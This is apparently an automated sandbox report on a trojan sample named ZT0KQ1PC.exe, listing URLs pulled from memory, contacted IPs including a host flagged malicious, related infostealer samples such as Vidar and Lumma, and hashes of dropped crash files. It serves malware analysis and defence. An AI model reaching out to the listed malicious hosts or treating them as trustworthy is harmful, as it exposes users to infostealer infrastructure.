https://dl.google.com/release2/chrome_component/ad5twkjlqvwikbzelyrya7eemgzq_9456/hfnkpimlhhgieaddgf	chrome.exe, 00000006.00000002.2934291583.00004C1C04A94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.ico	chrome.exe, 00000006.00000002.2936466990.00004C1C04FA8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.google.com/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindggfcj	chrome.exe, 00000006.00000002.2932323520.00004C1C0451C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/161903006	chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936971463.00004C1C050CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	chrome.exe, 00000006.00000002.2936466990.00004C1C04FA8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-1.corp.google.com/	chrome.exe, 00000006.00000003.1787448341.00004C1C0489C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.google.com/	chrome.exe, 00000006.00000003.1787448341.00004C1C0489C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933180215.00004C1C04714000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.ico	chrome.exe, 00000006.00000002.2934775621.00004C1C04BB4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000006.00000002.2934708891.00004C1C04B78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933700656.00004C1C048F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2938726931.00004C1C05458000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000006.00000002.2934740063.00004C1C04B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2938295108.00004C1C052E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933575887.00004C1C048A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_p	chrome.exe, 00000006.00000002.2934740063.00004C1C04B90000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3078	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7553	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4836&	chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/5375	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pa	chrome.exe, 00000006.00000002.2933607469.00004C1C048BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5371	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/dl/release2/chrome_component/eoxvpqsyhqbmcsgpe27edattly_3057/jflookgnkcckhobag	chrome.exe, 00000006.00000002.2932392658.00004C1C04554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://csp.withgoogle.com/csp/download-dt/1ppL	chrome.exe, 00000006.00000002.2932538602.00004C1C045A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000006.00000002.2932680702.00004C1C045E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1786558199.00004C1C045EC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000006.00000002.2934708891.00004C1C04B78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933700656.00004C1C048F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2938726931.00004C1C05458000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7556	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	chrome.exe, 00000006.00000002.2931820488.00004C1C0441C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-preprod.corp.google.com/	chrome.exe, 00000006.00000003.1787448341.00004C1C0489C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933180215.00004C1C04714000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199811540174hu76faMozilla/5.0	ZT0KQ1PC.exe, 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.google.com/dl/release2/chrome_component/gxfxw5tpagw5sjcjp5n3fng72a_2024.12.19.1218/ggkkeh	chrome.exe, 00000006.00000002.2934139529.00004C1C04A38000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6439$	chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://clients4.google.com/chrome-sync	chrome.exe, 00000006.00000002.2932739792.00004C1C0460C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3965(	chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/dl/release2/chrome_component/ac6mhlwypzipnufijdvfyhdgvt4q_67/khaoiebndkojlmpp	chrome.exe, 00000006.00000002.2934291583.00004C1C04A94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/dl/release2/chrome_component/eoxvpqsyhqbmcsgpe27edattly_3057/jflookgnkcckhoba	chrome.exe, 00000006.00000002.2932392658.00004C1C04554000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6692	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/dl/release2/chrome_component/ad5s34ywdsfcds6w2agkuf5izs4a_20241223.706874907.1	chrome.exe, 00000006.00000002.2934708891.00004C1C04B78000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/258207403	chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936971463.00004C1C050CC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6141L	chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/3502	chrome.exe, 00000006.00000003.1796231163.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796277084.00004C1C04F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795094381.00004C1C04784000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.68	www.google.com	United States	15169	GOOGLEUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
116.203.13.109	quils.shop	Germany	24940	HETZNER-ASDE	true

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584543
Start date and time:	2025-01-05 20:07:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ZT0KQ1PC.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@31/19@8/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 61 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 52.168.117.173, 142.250.184.238, 172.217.18.3, 74.125.71.84, 142.250.185.142, 216.58.212.131, 142.250.186.110, 142.250.186.106, 142.250.186.138, 172.217.18.10, 142.250.185.74, 142.250.185.202, 142.250.186.74, 172.217.23.106, 172.217.16.202, 142.250.184.234, 216.58.206.74, 216.58.212.138, 216.58.212.170, 142.250.185.106, 142.250.186.42, 142.250.185.170, 142.250.185.138, 142.250.185.234, 142.250.186.170, 172.217.18.106, 142.250.185.174, 142.250.185.78, 172.217.23.110, 216.58.212.174, 142.250.184.206, 172.217.16.195, 142.250.186.174, 216.58.206.78, 142.250.186.142, 20.190.160.20, 23.56.254.164, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): clients1.google.com, onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, login.live.com, blobcollector.events.data.trafficmanager.net, update.googleapis.com, umwatson.events.data.microsoft.com, clients.l.google.com, www.gstatic.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: ZT0KQ1PC.exe

Simulations

Behavior and APIs

Time	Type	Description
14:08:07	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	repo.huaweicloud.com-sh-2025-01-05T07_55_53.html	Get hash	malicious	Unknown	Browse
	https://statut-mondialrelay.com/	Get hash	malicious	Unknown	Browse
	avaydna.exe	Get hash	malicious	Njrat	Browse
	hkMUtKbCqV.exe	Get hash	malicious	Unknown	Browse
	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse
	https://bit.ly/3VYGxmh	Get hash	malicious	CAPTCHA Scam ClickFix, Phisher	Browse
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse
116.203.13.109	RisingStrip.exe	Get hash	malicious	Vidar	Browse
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	RisingStrip.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	149.154.167.99
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	over.ps1	Get hash	malicious	Vidar	Browse	149.154.167.99
	MatAugust.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
plus.l.google.com	http://www.cipassoitalia.it/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	142.250.181.238
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	172.217.23.110
	RisingStrip.exe	Get hash	malicious	Vidar	Browse	142.250.186.110
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	172.217.23.110
	https://specificallycries.com	Get hash	malicious	Unknown	Browse	142.250.186.142
	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	172.217.23.110
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	216.58.212.174
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	142.250.181.238
	over.ps1	Get hash	malicious	Vidar	Browse	142.250.184.206
	MatAugust.exe	Get hash	malicious	Vidar	Browse	172.217.18.14
play.google.com	https://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw==	Get hash	malicious	Unknown	Browse	142.250.186.110
	http://www.cipassoitalia.it/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	216.58.206.78
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	142.250.186.174
	RisingStrip.exe	Get hash	malicious	Vidar	Browse	142.250.185.142
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	172.217.18.14
	https://specificallycries.com	Get hash	malicious	Unknown	Browse	142.250.186.46
	https://myburbank-uat.3didemo.com	Get hash	malicious	HTMLPhisher	Browse	142.250.186.174
	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	216.58.206.46
	setup.exe	Get hash	malicious	Unknown	Browse	172.217.18.14
	https://thetollroads.com-wfmo.xyz/us	Get hash	malicious	Unknown	Browse	142.250.186.142

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	RisingStrip.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	149.154.167.220
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FACT0987789000900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	149.154.167.99
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mcgen.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
HETZNER-ASDE	cZO.exe	Get hash	malicious	Unknown	Browse	128.140.43.40
	jaTDEkWCbs.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	NpHauDPoR8.exe	Get hash	malicious	Unknown	Browse	88.198.29.97
	armv6l.elf	Get hash	malicious	Mirai	Browse	85.10.220.49
	1.elf	Get hash	malicious	Unknown	Browse	138.201.212.111
	RisingStrip.exe	Get hash	malicious	Vidar	Browse	116.203.13.109
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	135.181.65.216
	2Mi3lKoJfj.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	3.elf	Get hash	malicious	Unknown	Browse	195.201.78.91
	2.elf	Get hash	malicious	Unknown	Browse	212.127.42.203

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	116.203.13.109 149.154.167.99
	setup.msi	Get hash	malicious	Unknown	Browse	116.203.13.109 149.154.167.99
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	116.203.13.109 149.154.167.99
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	116.203.13.109 149.154.167.99
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	116.203.13.109 149.154.167.99
	K27Yg4V48M.exe	Get hash	malicious	LummaC	Browse	116.203.13.109 149.154.167.99
	IH5XqCdf06.exe	Get hash	malicious	LummaC	Browse	116.203.13.109 149.154.167.99
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	116.203.13.109 149.154.167.99
	c2.hta	Get hash	malicious	Remcos	Browse	116.203.13.109 149.154.167.99
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	116.203.13.109 149.154.167.99

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ZT0KQ1PC.exe_57cf135b946bfc19e6acf63b86541aefa55268e8_781a0c29_a6445ff7-6e45-4303-bc5f-dc4255df562d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8875952333598636
Encrypted:	false
SSDEEP:	96:UpFllw6UAT1s7hLjTOAqyS3QXIDcQlc6VcEdcw3N+BHUHZ0ownOgHkEwH3dEFYAU:Idw7AT1dA0LR38auGzuiFcFZ24IO8qo
MD5:	0D1596ED10EEC20C5CAD396DA33D6FDE
SHA1:	E358F6F1BC970D6B20B568578231BA03E48B0CA6
SHA-256:	F9290ECD3B5A3F390677DC4E30FA8D95B441BE305B2ACE4D974D38F99F44AF43
SHA-512:	A91608EFEE30DDB833E8BC5E729F9FB613C25DD4EA4223176FF6B605F0E2D497C7BAF0EF829E4422EFE3990A85099D2EC4367B65903052BF3955C8385DB7E1AA
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.7.7.6.7.5.0.3.0.6.6.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.7.7.6.7.5.4.9.9.4.1.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.4.4.5.f.f.7.-.6.e.4.5.-.4.3.0.3.-.b.c.5.f.-.d.c.4.2.5.5.d.f.5.6.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.b.6.2.f.d.7.-.3.b.1.2.-.4.d.6.b.-.b.1.2.2.-.2.b.8.9.6.2.a.a.a.a.7.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Z.T.0.K.Q.1.P.C...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.2.0.-.0.0.0.1.-.0.0.1.4.-.9.2.b.a.-.a.7.1.f.a.5.5.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.1.a.2.4.8.e.1.8.4.e.c.c.e.1.8.2.f.d.9.e.e.a.5.a.9.4.e.9.0.d.e.0.0.0.0.f.f.f.f.!.0.0.0.0.4.4.a.d.b.8.5.a.c.b.8.4.a.b.5.8.b.0.2.0.f.3.1.1.4.0.2.2.e.b.b.6.d.4.5.1.6.a.b.3.!.Z.T.0.K.Q.1.P.C...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.6.4./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9128.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Jan 5 19:07:55 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	154415
Entropy (8bit):	3.770257669259657
Encrypted:	false
SSDEEP:	1536:6uLX1duBojRypN4uE2aOoULTgQYAM1tUCDtvpHg9/tTQ9bP:6uLJU4uEqoULTgJftvpA9VG
MD5:	540BA06F6558BACE0FE9344610E671AA
SHA1:	3C1709FD24ECDD24E8E3092C22B4E01286B5DBEC
SHA-256:	1886AFDE8CA03E57690A8DBFF3743F0BE0F6362C2C0CB8FC3AEB7BD6B4C9CBE0
SHA-512:	C80F30CC18B02CF322DDFB56A3AC2BE326804305197071950A4C3EEE158CC6056C23BDCB4962631A74B1488BAF851005CE0407FF25F7B9F1022D1CD65CBD0F18
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........zg....................................$...........d..../..........`.......8...........T............$../7......................................................................................................eJ......P.......GenuineIntel............T....... .....zg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9242.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8374
Entropy (8bit):	3.6927624297993424
Encrypted:	false
SSDEEP:	192:R6l7wVeJejQ6Q6Y9VSU9rfIgmfwVJbpr/89bIRDsf0feBm:R6lXJwQ6Q6YfSU9DIgmfwVJWIRofj8
MD5:	103E2F7831DA6B2B688C100AB64F4C04
SHA1:	8D31E2A26CEE18089372214D8F90BBC171185C8B
SHA-256:	1DB55CCAD672D8E54B9826AC349CE0157E60BFFD688A1E7FC468D996C2E09F70
SHA-512:	9EE6BA1D915D0D50B312C845B92CBFC26B01E5569BE28C5700220A86535BD509834909346FFB8CC577CC951D2CD90004C6B5B6BA2DD580218CA9913E881FCDDA
Malicious:	false
Reputation:	low
